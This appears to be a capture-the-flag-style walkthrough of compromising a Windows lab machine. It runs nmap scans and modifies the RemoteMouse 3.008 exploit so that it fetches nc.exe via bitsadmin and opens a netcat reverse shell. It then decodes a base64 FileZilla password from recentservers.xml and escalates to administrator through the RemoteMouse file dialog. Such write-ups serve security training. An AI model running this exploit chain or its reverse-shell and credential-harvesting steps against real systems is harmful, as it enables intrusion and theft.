Summary
In this walkthrough, we target the service running on port 1978 by using RemoteMouse 3.008 exploit which can be used to perform an arbitrary RCE. We launch the exploit after making some modifications in the code and then capture a reverse shell using Netcat. We explore the directories of the target to identify the location of FileZilla and then grab its password which is encoded using base64. After decoding the password, we login to the target system using Remote Desktop service. We launch the Remote Mouse application inside the target system, and open a Command Prompt session as administrator.
Enumeration
Let's enumerate the target by running a Nmap scan to find open ports and services.
┌──(kali㉿kali)-[~/mice_test]
└─$ nmap -sC -sV -oN scan.txt 192.168.245.140 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( <https://nmap.org> ) at 2021-06-10 11:37 EDT
Nmap scan report for 192.168.245.140
Host is up (0.00045s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2021-06-10T15:38:13+00:00
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2021-06-09T15:06:20
|_Not valid after: 2021-12-09T15:06:20
|_ssl-date: 2021-06-10T15:38:13+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds
We find that port 3389 is open by only checking the default common ports. Let's try to run a full port scan.
┌──(kali㉿kali)-[~/mice_test]
└─$ nmap -sC -sV -oN scan_full.txt -p- -Pn 192.168.245.140
Nmap scan report for 192.168.245.140
Host is up (0.0013s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
1978/tcp open unisql?
| fingerprint-strings:
| DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, ms-sql-s:
|_ SIN 15win nop nop 300
1979/tcp open unisql-java?
1980/tcp open pearldoc-xact?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2021-06-10T12:21:20+00:00
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2021-06-09T12:10:35
|_Not valid after: 2021-12-09T12:10:35
|_ssl-date: 2021-06-10T12:21:48+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port1978-TCP:V=7.91%I=7%D=6/10%Time=60C2032A%P=x86_64-pc-linux-gnu%r(NU
SF:LL,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r(GenericLines,15,"SIN\\x2015
SF:win\\x20nop\\x20nop\\x20300")%r(GetRequest,15,"SIN\\x2015win\\x20nop\\x20nop\\
SF:x20300")%r(HTTPOptions,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r(RTSPRe
SF:quest,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r(DNSVersionBindReqTCP,15
SF:,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r(Help,15,"SIN\\x2015win\\x20nop\\x2
SF:0nop\\x20300")%r(SSLSessionReq,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r
SF:(TLSSessionReq,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r(FourOhFourRequ
SF:est,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r(LPDString,15,"SIN\\x2015wi
SF:n\\x20nop\\x20nop\\x20300")%r(LDAPSearchReq,15,"SIN\\x2015win\\x20nop\\x20nop
SF:\\x20300")%r(LDAPBindReq,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r(SIPOp
SF:tions,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300")%r(LANDesk-RC,15,"SIN\\x201
SF:5win\\x20nop\\x20nop\\x20300")%r(JavaRMI,15,"SIN\\x2015win\\x20nop\\x20nop\\x2
SF:0300")%r(ms-sql-s,15,"SIN\\x2015win\\x20nop\\x20nop\\x20300");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Thu Jun 10 08:21:49 2021 -- 1 IP address (1 host up) scanned in 297.26 seconds
We find ports 1978, 1979, 1980, and 3389 are open. Nmap is unable to fingerprint port 1978. While searching for more info about this port, we don't find any useful information in Speed Guide's Port 1978 Details page.
After googling for exploits for port 1978, we find RemoteMouse 3.008 - Arbitrary Remote Command Execution exploit from ExploitDB. Let's try to confirm this using Searchsploit.
┌──(kali㉿kali)-[~]
└─$ searchsploit remotemouse
------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
RemoteMouse 3.008 - Arbitrary Remote Command Execution | windows/remote/46697.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Remote Mouse is a program that allows to turn a mobile device (Android or iOS) into a wireless keyboard or mouse for a PC/Laptop. It uses port 1978 for communication. For this we need to install it in our systems in conjunction with its sister Android or iOS app. This allows us to execute arbitrary programs as an “Administrator” by using the “Image Transfer Folder” feature.
Exploitation
Let's mirror the exploit into our present working directory using Searchsploit.
┌──(kali㉿kali)-[~/mice_test]
└─$ searchsploit -m 46697
Exploit: RemoteMouse 3.008 - Arbitrary Remote Command Execution
URL: <https://www.exploit-db.com/exploits/46697>
Path: /usr/share/exploitdb/exploits/windows/remote/46697.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/kali/mice_test/46697.py
The exploit is just a proof of concept that pops up calc.exe. We need to modify the exploit to download nc.exe from our machine and spawn a reverse shell. Copy the following Python code a replace it in the place of PopCalc() function (inside 46697.py file) and then save it.
...
...
...
cmd1='mkdir c:\\\\pwn'
cmd2='bitsadmin /transfer job /download /priority high <http://192.168.245.139/nc.exe> c:\\\\pwn\\\\nc.exe'
cmd3='c:\\\\pwn\\\\nc.exe -e cmd.exe 192.168.245.139 443'
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("cmd.exe",ip)
sleep(1)
SendString("\\n",ip)
sleep(1)
SendString(cmd1,ip)
sleep(1)
SendString("\\n",ip)
sleep(1)
SendString(cmd2,ip)
sleep(1)
SendString("\\n",ip)
sleep(25)
SendString(cmd3,ip)
sleep(1)
SendString("\\n",ip)
print("SUCCESS!",ip)
...
...
...
Note: In the above code, we need to provide our Kali machine's IP address.
Let's copy nc.exe to /var/www/html and then start apache2 service.
┌──(kali㉿kali)-[~/mice_test]
└─$ sudo cp /usr/share/windows-binaries/nc.exe /var/www/html
┌──(kali㉿kali)-[~/mice_test]
└─$ sudo systemctl start apache2
We start a Netcat listener to catch the reverse shell.
┌──(kali㉿kali)-[~/mice_test]
└─$ sudo nc -nlvp 443
[sudo] password for kali:
listening on [any] 443 ...
Now, we run the exploit providing the IP address of the target.
┌──(kali㉿kali)-[~/mice_test]
└─$ python2 46697.py 192.168.245.140
('SUCCESS!', '192.168.245.140')
Our Kali machine catches the reverse shell in the terminal where the Netcat session is listening.
┌──(kali㉿kali)-[~/mice_test]
└─$ sudo nc -nlvp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.245.139] from (UNKNOWN) [192.168.245.140] 49726
Microsoft Windows [Version 10.0.19043.1052]
(c) Microsoft Corporation. All rights reserved.
C:\\Users\\divine>
We now have shell access on the target system.
Local Enumeration
While enumeration the target, we find that the Filemicea FTP Client is installed in C:\\Program Files directory.
C:\\Program Files>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7E75-475C
Directory of C:\\Program Files
10-06-2021 20:33 <DIR> .
10-06-2021 20:33 <DIR> ..
11-06-2021 06:11 <DIR> Common Files
10-06-2021 20:33 <DIR> FileZilla FTP Client
07-12-2019 15:21 <DIR> Internet Explorer
07-12-2019 14:44 <DIR> ModifiableWindowsApps
11-06-2021 05:50 <DIR> MSBuild
11-06-2021 05:50 <DIR> Reference Assemblies
10-06-2021 13:37 <DIR> Sublime Text
10-06-2021 13:33 <DIR> VMware
10-06-2021 20:22 <DIR> Windows Defender
11-06-2021 06:06 <DIR> Windows Defender Advanced Threat Protection
09-04-2021 19:23 <DIR> Windows Mail
09-04-2021 19:23 <DIR> Windows Media Player
07-12-2019 15:24 <DIR> Windows Multimedia Platform
07-12-2019 15:20 <DIR> Windows NT
09-04-2021 19:23 <DIR> Windows Photo Viewer
07-12-2019 15:24 <DIR> Windows Portable Devices
07-12-2019 15:01 <DIR> Windows Security
07-12-2019 15:01 <DIR> WindowsPowerShell
0 File(s) 0 bytes
20 Dir(s) 10,001,031,168 bytes free
Let's check the hidden files inside Users directory using /a flag.
C:\\Users\\divine>dir /a
dir /a
Volume in drive C has no label.
Volume Serial Number is 7E75-475C
Directory of C:\\Users\\divine
10-06-2021 20:38 <DIR> .
10-06-2021 20:38 <DIR> ..
10-06-2021 20:36 <DIR> 3D Objects
10-06-2021 20:30 <DIR> AppData
10-06-2021 20:30 <JUNCTION> Application Data [C:\\Users\\divine\\AppData\\Roaming]
10-06-2021 20:36 <DIR> Contacts
10-06-2021 20:30 <JUNCTION> Cookies [C:\\Users\\divine\\AppData\\Local\\Microsoft\\Windows\\INetCookies]
10-06-2021 20:36 <DIR> Desktop
10-06-2021 20:36 <DIR> Documents
10-06-2021 20:36 <DIR> Downloads
10-06-2021 20:36 <DIR> Favorites
10-06-2021 20:36 <DIR> Links
10-06-2021 20:30 <JUNCTION> Local Settings [C:\\Users\\divine\\AppData\\Local]
10-06-2021 20:36 <DIR> Music
10-06-2021 20:30 <JUNCTION> My Documents [C:\\Users\\divine\\Documents]
10-06-2021 20:30 <JUNCTION> NetHood [C:\\Users\\divine\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts]
10-06-2021 20:36 1,048,576 NTUSER.DAT
10-06-2021 20:30 271,360 ntuser.dat.LOG1
10-06-2021 20:30 356,352 ntuser.dat.LOG2
10-06-2021 20:30 65,536 NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf
10-06-2021 20:30 524,288 NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms
10-06-2021 20:30 524,288 NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms
10-06-2021 20:30 20 ntuser.ini
10-06-2021 20:38 <DIR> OneDrive
10-06-2021 20:37 <DIR> Pictures
10-06-2021 20:30 <JUNCTION> PrintHood [C:\\Users\\divine\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts]
10-06-2021 20:30 <JUNCTION> Recent [C:\\Users\\divine\\AppData\\Roaming\\Microsoft\\Windows\\Recent]
10-06-2021 20:36 <DIR> Saved Games
10-06-2021 20:37 <DIR> Searches
10-06-2021 20:30 <JUNCTION> SendTo [C:\\Users\\divine\\AppData\\Roaming\\Microsoft\\Windows\\SendTo]
10-06-2021 20:30 <JUNCTION> Start Menu [C:\\Users\\divine\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu]
10-06-2021 20:30 <JUNCTION> Templates [C:\\Users\\divine\\AppData\\Roaming\\Microsoft\\Windows\\Templates]
10-06-2021 20:36 <DIR> Videos
7 File(s) 2,790,420 bytes
26 Dir(s) 10,000,674,816 bytes free
FileZilla passwords are stored in the User's AppData directory in a file named recentservers.xml. Let's take a look.
C:\\Users\\divine\\AppData\\Roaming\\FileZilla>type recentservers.xml
type recentservers.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
<RecentServers>
<Server>
<Host>ftp.pg</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>divine</User>
<Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
<Logontype>1</Logontype>
<PasvMode>MODE_DEFAULT</PasvMode>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>
We find the password in this file which is encoded using base64. Let's decode it to get the password in plaintext.
┌──(kali㉿kali)-[~/mice_test]
└─$ echo Q29udHJvbEZyZWFrMTE= | base64 -d
ControlFreak11
We get the password in plaintext.
Escalation
Let's try to login as divine using the password ControlFreak11 via RDP (Remote Desktop Protocol).
┌──(kali㉿kali)-[~/mice_test]
└─$ rdesktop 192.168.245.140
A new RDP (Windows) window will be opened. We can see that the Remote Mouse is installed and can be seen on the desktop that it runs with admin privileges (shield icon).
let's open the Remote Mouse application from the system tray.
We go to the Settings tab in the application window and then click on the Change... button in Image Transfer Folder section.
We need to click on the OK button when we receive and error prompt.
An explorer window is appears which prompts to choose a location for Image Transfer Folder.
We need to remove the path and replace it with C:\\Windows\\System32\\cmd.exe in the address bar.
Here, we can see that a Command Prompt is spawned with Administrator privileges.
We now have Administrator access on the target system.
Discussion